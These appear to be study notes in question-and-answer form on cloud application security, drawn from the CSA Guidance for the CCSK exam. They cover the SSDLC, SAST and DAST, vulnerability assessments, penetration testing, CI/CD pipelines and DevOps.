10. Application Security - DONE

Question 1

What are the major changes associated with application security in a cloud environment.?

Answer 1

*Secure software development lifecycle (SSDLC) Use the SSDLC to determine how cloud computing affects application security from initial design through to deployment.
*Design and architecture Several new trends in designing applications in a cloud environment affect and can improve security.
*DevOps and continuous integration/continuous deployment (CI/CD) DevOps and CI/CD are frequently used in both development and deployment of cloud applications and are becoming a dominant approach to software development, both in the cloud and in traditional data centers. DevOps brings new security considerations and opportunities to improve security from what you do today.

Question 2

Essentially, an SSDLC describes a series of security activities that should be performed during all phases of application design and development, deployment, and operations. Here are some of the more common frameworks used in the industry:

Answer 2

“*Microsoft Security Development Lifecycle
*NIST 800-64, “Security Considerations in the System Development Life Cycle”
*ISO/IEC 27034 Application Security Controls Project
*OWASP Open Web Application Security Project (S-SDLC)

Although these frameworks all work toward a common goal of increasing security for applications, they all go about it just a little differently.

Question 3

“Cloud computing will impact every phase of the SSDLC, regardless of which particular framework you use. This is a direct result of the abstraction and automation of the cloud, combined with a greater reliance on your cloud provider.

the Cloud Security Alliance breaks down the SSDLC into three larger phases:

Answer 3

*Secure design and development This phase includes activities ranging from training and developing organizational standards to gathering requirements, performing design reviews through threat modelling (such as STRIDE), and writing and testing code.

*Secure deployment This phase addresses security and testing activities that must be performed when you’re moving application code from a development environment into production.

*Secure operations This phase concerns the ongoing security of applications as they are in a production environment. It includes additional defenses such as web application firewalls, ongoing vulnerability assessments, penetration tests, and other activities that can be performed once an application is in a production environment.

Answer 4

“Remember that in the shared responsibility model, change is based on the service model—whether IaaS, PaaS, or SaaS. If you are developing an application that will run in an IaaS service model, you would be responsible for more security than the provider would be with regard to using and leveraging other features and services supplied by a PaaS provider. In addition, the service model affects the visibility and control that you have. For example, in a PaaS model, you may no longer have access to any network logs for troubleshooting or security investigation purposes.”

Question 5

the CSA defines five phases involved in secure application design and development, all of which are affected by cloud computing:

Answer 5

Question 6

What does the training phase in secure application design and development involve?

Answer 6

The CSA Guidance calls for three different roles (developers, operational staff, and security teams) and three categories of training (vendor-neutral cloud security training, vendor-specific training, and development tool training), which should all receive vendor-neutral training on cloud security fundamentals (such as the CCSK).

These same groups should also undertake vendor-specific training on the cloud providers and platforms that are being used by an organization. Additionally, developers and operation staff who are directly involved in architecting and managing the cloud infrastructure should receive specific training on any development tools that will be used.

One of the final training elements should deal with how to create security tests. As the old saying goes, the answers you get are only as good as the questions you ask. In fact, some companies tell the developers in advance which security tests will be performed. Because the developers know what will be checked by the security team before a system is accepted, this approach can lead to more secure applications being created in the first place. In a way, this is a way to set up developers for success before they even begin writing code.

Question 7

How can The OWASP be helpful in the training phase in secure application design and development?

Answer 7

Notice the inclusion of secure coding practices. The OWASP (Open Web Application Security Project) is one of the leading resources for web development. You can use the OWASP secure coding practices checklist to address key development items such as input validation, output in coding, authentication and password management, session management, access control, cryptographic practices, error handling and logging, communication security, system configuration, database security, file management, memory management, and general coding practices.”

Question 8

What does the Define phase in secure application design and development involve?

Answer 8

In this phase, coding standards are determined (usually based on compliance requirements) and functional requirements are identified. In other words, you determine what this application must do from a security perspective. This is, of course, above and beyond any business requirements that the application needs to address.

Question 9

What does the Design phase in secure application design and development involve?

Answer 9

During the application design phase, you need to determine whether there are any security issues with the design of the application itself. (Note that this is about design, not actual development.) You need to establish an understanding between the security and software development teams as to how the software application is architected, any modules that are being consumed, and so on.

The benefit of going through steps such as threat modelling is that you don’t have to take two steps forward and three steps back after the security team starts reviewing the application code itself. This can save you substantial amounts of time in development. Of course, you need to consider cloud providers and provider services as part of this application review. For example, you could ensure that your provider supports required logging capabilities as part of the design phase.

Question 10

What does the Development phase in secure application design and development involve?

Answer 10

In the development phase, we finally get to build the application. As with every other system and application ever built the development environment should be an exact replica of the production environment. In other words, developers should never create applications in a production environment or hold actual production data as a part of the development phase. Developers will also probably be using some form of CI/CD pipeline, which needs to be properly secured, with a particular focus on the code repository (such as GitHub). In addition, if you will be leveraging PaaS or serverless development, enhanced logging must be baked into an application to compensate for the lack of logging that is usually available in such scenarios.

Question 11

What does the testing phase in secure application design and development involve?

Answer 11

testing should be performed while an application is being developed. These tests can include code review, unit testing, static analysis, and dynamic analysis. ”

Question 12

How has the deployment phase changed over time?

Answer 12

The deployment phase marks the transition or handover of code from developers to operations. Traditionally, this has been the point at which a final quality check occurs, including user acceptance testing. The cloud, DevOps, and continuous delivery are changing that, however, and are enabling tests to be automated and performed earlier in the lifecycle. Many types of application security tests can be integrated into both development and deployment phases

Question 13

Here are some of the application security tests highlighted in the CSA Guidance:

Answer 13

*Code review This process does not change as a result of moving to the cloud. There are, however, specific cloud features and functions that may be leveraged as part of an application, and you need to ensure that the least privilege is enabled at all times inside the application code and all dependencies. Not only should user permissions follow least privilege, but services and any roles that may be used to access other services should do so as well. The worst thing you could do from an application-permission perspective is to have tight access controls for the users who can access the application and give the application full control over every aspect of a cloud environment. That said, you need to ensure that anything related to authentication, including the credentials used by an application and any required encryption, is reviewed as part of code review.

*Unit testing, regression testing, and functional testing These standard tests are used by developers and should address any API calls being used to leverage the functionality provided by a cloud provider.

*Static application security testing SAST analyzes application code offline. SAST is generally a rules-based test that will scan software code for items such as credentials embedded into application code and a test of input validation, both of which are major concerns for application security.

*Dynamic application security testing While SAST looks at code offline, DAST looks at an application while it is running. An example of DAST is fuzz testing, in which you throw garbage at an application and try to generate an error on the server (such as an “error 500” on a web server, which is an internal server error). Because DAST is a live test against a running system, you may need to get approval in advance from your provider prior to starting.”

Question 14

“ credentials and encryption in an application are the primary differences between applications that run in a cloud versus those that run a traditional data center.”

Answer 14

“ credentials and encryption in an application are the primary differences between applications that run in a cloud versus those that run a traditional data center.

Question 15

Cloud Impacts on Vulnerability Assessments.

Answer 15

Vulnerability assessments (VAs) should always be performed on images before they are used to launch instances. VAs can be integrated into the CI/CD pipeline. Testing images should occur in a special locked-down test environment such as a virtual network or separate account. As with all security tests, however, this must be done after approval for any testing is given by the provider.

“With an ongoing VA of running instances, you can use host-based VA tools to get complete visibility into any vulnerabilities on a system. VAs can also be used to test entire virtual infrastructures by leveraging infrastructure as code (IaC) to build this test environment. This enables you to generate an exact replica of a production environment in minutes, so you can properly assess an application and all infrastructure components without the risk of impacting the production environment.

Question 16

What are the two ways VAs can be run?

Answer 16

“One perspective is that a VA should be performed directly on a system itself to provide complete transparency and to allay fears that security controls in front of the system are hiding any exposures that actually exist. This is known as a “host-based” view.

The other approach is to take the view of an outsider and perform the VA with all controls, such as virtual firewalls, taken into account.

The CSA Guidance suggests that you use a host-based view by leveraging host-based agents. In this case, cloud provider permission will not be required, because the assessment is performed on the server, not across the provider’s network.

Question 17

As with VAs, penetration tests can also be performed in a cloud environment, and you’ll need permission from the provider to perform them.

Answer 17

“The CSA recommends adapting your current penetration testing for the cloud by using the following guidelines:

*Use testing firms and individuals with experience working with the cloud provider where the application is deployed. Your applications will likely be using services supplied by the cloud service provider (CSP), and a penetration tester who does not understand the CSP’s services may miss critical findings.

*The penetration test should address the developers and cloud administrators themselves. This is because many cloud breaches attack those who maintain the cloud, not just the application running in the cloud. Testing should include the cloud management plane.

*If the application you are testing is a multitenant application, ensure that the penetration tests include attempts to break tenant isolation and gain access to another tenant

Question 18

“ automated CI/CD pipelines can actually enhance security. Explain how.

Answer 18

“through supporting immutable infrastructures, automating security testing, and providing extensive logging of application and infrastructure changes when such changes are performed through the pipeline. The real power here is that there is no opportunity for human error to occur when it comes to testing—100 percent of the testing is performed 100 percent of the time. Test results can be directed toward a test result bucket so that, in the case of an audit, for example, all testing is easily demonstrated to an auditor. Logs can also be configured to state the person or system that submitted a change, and automated approval can also be implemented in a change management system if all tests were successfully passed.

As with anything else, the pipeline must be tightly secured. Pipelines should be hosted in a dedicated cloud environment with very limited access to production workloads or the infrastructure hosting the pipeline component”

Question 19

“Components of a continuous deployment pipeline”

Answer 19

Question 20

“there are two central components of the deployment pipeline: ”.

Answer 20

“The version control repository (such as GitHub) is where code is stored, and the continuous integration server (such as Jenkins) has the ability to use plug-ins in to perform any prebuild, build, and post-build activities. Activities here could include performing security tests or functional tests and sending results to a specified location. Additionally, the continuous integration server can connect to a change management system that will track any approved changes to an environment. You can also set thresholds on test results. For example, if there are any critical findings, the continuous integration server will not even build the application or perform the action that has been requested.

All of these tests are created in advance. From a security perspective, this means that although you still have separation of duties with a CI/CD pipeline, humans are not performing the tests at build time. With this in mind, you can see how some (and, more importantly, the CSA Guidance) consider an automated continuous deployment pipeline as being a more secure approach to deploying software to an environment.

Question 21

Impact of IaC and Immutable Workloads

Answer 21

“you know that IaC uses templates to create everything, from the configuration of a particular server instance to building the entire cloud virtual infrastructure. The depth of IaC capabilities is entirely provider-dependent. If the provider does not support API calls to create a new user account, for example, you must do this manually.

Because these environments are automatically built for us from a set of source file definitions (templates), they can also be immutable. This means that any changes that are manually implemented will be overwritten the next time a template is run. When you use an immutable approach, you must always check for any changes made to the environment, and these changes must be made through these templates—potentially through the continuous deployment pipeline if you are using one. This enables you to lock down the entire infrastructure tightly—much more than is normally possible in a non-cloud application deployment.
The bottom line here is that when security is properly engaged, the use of IaC and immutable deployments can significantly improve security.

Question 22

Secure operations.]
“Other elements of security, such as infrastructure security (Chapter 7), container security (Chapter 8), data security (Chapter 11), and identity and access management (Chapter 12), are key components in a secure operations phase.”

“The following is additional guidance that directly applies to application security:

Answer 22

“*Production and development environments should always be separated. Access to the management plane for production environments should be tightly locked down, compared to that of the development environment. When assessing privileges assigned to an application, you must always be aware of the credentials being used by the application to access other services. These must be assigned on a least-privilege basis, just as you would assign least privilege to user accounts. Multiple sets of credentials for each application service can be implemented to compartmentalize entitlements (permissions) further to support the least-privilege approach.
*Even when using an immutable infrastructure, you should actively monitor for changes and deviations from approved baselines. Again, depending on the particular cloud provider, this monitoring can and should be automated whenever possible. You can also use event-driven security (covered in the next section) to revert any changes to the production environment automatically.
*Application testing and assessment should be considered an ongoing process, even if you are using an immutable infrastructure. As always, if any testing and/or assess“ments will be performed across the provider’s network, they should be performed with the permission of the CSP to avoid violating any terms of service.
*Always remember that change management isn’t just about application changes. Any infrastructure and cloud management plane changes should be approved and tracked.”

Question 23

“Several traits of the cloud can be used to augment the security of applications through application architecture itself: examples include

Answer 23

“Cloud services can offer segregation by default. Applications can be run in their own isolated environment. Depending on your provider, you can run applications in separate virtual networks or different accounts. Although operational overhead will be incurred when using a separate account for every application, using separate accounts offers the benefit of enabling management plane segregation, thus minimizing access to the application environment.

If you do have an immutable infrastructure, you can increase security by disabling remote logins to immutable servers and other workloads, adding file integrity monitoring, and integrating immutable techniques into your instant recovery plans.

PaaS and serverless technologies can reduce the scope of your direct security responsibilities, but this comes at the cost of increasing your due diligence responsibilities. This is because you are leveraging a service from the provider (assuming the provider has done a good job in securing the services they offer customers). The provider is responsible for securing the underlying services and operating systems.

Question 24

here are two major concepts that serverless computing can deliver to increase the security of our cloud environments:

Answer 24

*Software-defined security This concept involves automating security operations and could include automating cloud incident response, changes to entitlements (permissions), and the remediation of unapproved infrastructure changes.

*Event-driven security This puts the concept of software-defined security into action. You can have a system monitoring for changes that will call a script to perform an automatic response in the event of a change being discovered. For example, if a security group is changed, a serverless script can be kicked off to undo the change. This interaction is usually performed through some form of notification messaging. Security can define the events to monitor and use event-driven capabilities to trigger automated notification and response. - uses serverless

“software-defined security is a concept, whereas event-driven security puts that concept into action.”

Question 25

“microservices are a growing trend in application development and are well-suited to cloud environments. How can they impact application design and architecture?

Answer 25

Using microservices, you can break down an entire application into its individual components and run those components on separate virtual servers or containers. In this way, you can tightly control access and reduce the attack surface of the individual functions by eliminating all services that are not required for a particular function to operate.

Leveraging auto-scaling can also assist with availability, as only functions that require additional compute capacity need to be scaled up. There is additional overhead from a security perspective with microservices, however, because communications between the various functions and components need to be tightly secured. This includes securing any service discovery, scheduling, and routing services.

Question 26

What is DevOPS

Answer 26

“to have a deeper integration of development and operations teams that delivers automation of application deployments and infrastructure operations, resulting in higher-quality code in a faster time frame.

“It is a culture, not a tool. Nor is it technology that you can just buy off the shelf and implement. ”

“From a technical perspective, DevOps relies on the CI/CD pipeline. It will use programmatic automation tools to improve the management of an infrastructure. Although DevOps is a new technology that is often seen in the cloud, it is not exclusively a cloud-based approach to software deployment.”

Question 27

SecDevOps vs DevSecOps

Answer 27

Technically, using SecDevOps means you put security first, whereas saying DevSecOps means you do the development, through security, and then hit operations. The main goal either way is that you are integrating security checks into the CI/CD pipeline.

Question 28

Rugged DevOps

Answer 28

Basically, this refers to the integration of security testing throughout the entire application development process to produce more secure (aka rugged) and resilient applications”

Question 29

Security Implications and Advantages of DevOps

Answer 29

The CI/CD pipeline produces master images for virtual machines, containers, and infrastructure stacks very quickly and consistently. This enables automated deployments and immutable infrastructure. How is code approved to be deployed? You integrate security tests into the build process. Of course, manual testing is also possible as a final check prior to the application being launched in a production environment.

Auditing can be supported (and in many cases improved) through this automated testing of application code prior to the application being built. Everything can be tracked down to the individual changes in source files, all the way back to the person who made a change and an entire history of changes, which can be tracked in a single location. This offers considerable audit- and change-tracking benefits.

Speaking of change management, if the change management system you currently use exposes APIs, the CI/CD pipeline can automatically obtain approval for any deployment. Simply put, if a request for deployment comes in through the continuous integration server, the change management system can be set up to approve automatically any change based on the fact that the tests have been successful.

Answer 30

“*Understand the security capabilities of your cloud provider and know that every platform and service needs to be inspected prior to adoption.

*Build security into the initial design process. Security is commonly brought into applications when it is too late. Secure applications are a result of a secure design.

*Even if you don’t have a formal software development life cycle in your organization, consider moving toward a continuous deployment method and automating security into the deployment pipeline. This still supports separation of duties, but a human is not performing the tests every single time. The security team creates the tests and the automated system runs them 100 percent thoroughly, 100 percent of the time

*Threat modeling such as STRIDE, static application security testing (SAST), and dynamic application security testing (DAST) should all be integrated into application development.

Answer 31

*Application testing must be created and performed for a particular cloud environment. A major focus of application checks in a cloud environment is that of API credentials that are being used. Simply stated, you want to ensure that any application does not access other services with excessive privileges.

*If you are going to leverage new architectural options and requirements, you will need to update security policies and standards. Don’t merely attempt to enforce existing policies and standards in a new environment, where things are created and run differently than in a traditional data center.

*Use software-defined security to automate security controls.

*Event-driven security is a game-changer. Using serverless technology, you can easily kick off a script that will automatically respond to a potential incident.

*Applications can be run in different cloud environments, such as under different accounts, to improve segregation of management plane access.”

Question 32

Prior to developing applications in a cloud, which training(s) should be undertaken by security team members?

Answer 32

Security team members should take both vendor-neutral training (such as CCSK) and provider-specific training (these are also recommended for developers and operations staff). Tools that are specific to deployments are not listed as required for security team members, only for operations and development staff.

Question 33

Tristan has just been hired as CIO of a company. His first desired action is to implement DevOps. Which of the following is the first item that Tristan should focus on as part of DevOps?

Answer 33

“Remember that DevOps is a culture, not a tool or technology (although a continuous integration service is a key component of the CI/CD pipeline that will be leveraged by DevOps). Understanding the existing corporate culture and getting leadership buy-in should be Tristan’s first course of action in implementing DevOps in his new position. DevOps is not a cloud technology.

Question 34

When you’re planning a vulnerability assessment, what is the first action you should take?

Answer 34

You should always determine whether a vendor must be advised of any assessment in advance. If the provider requires advance notice as part of the terms and conditions of your use, not advising them of an assessment may be considered a breach of contract.

Question 35

Which of the following CI/CD statements is false?

Answer 35

The false statement is that a CI/CD system replaces the current change management processes. In fact, a CI/CD system can integrate with your current change management system. All the other statements are true.

Question 36

During which phase of the SSDLC should penetration testing first be performed by customers?

Answer 36

Penetration testing should be initially performed as part of the deployment phase of the SSDLC. You need to have an actual application to perform penetration testing against, and this testing should be performed before the application runs in a production environment. Of course, periodic penetration testing is a good thing during the operations phase, but the question asked when it should first be performed.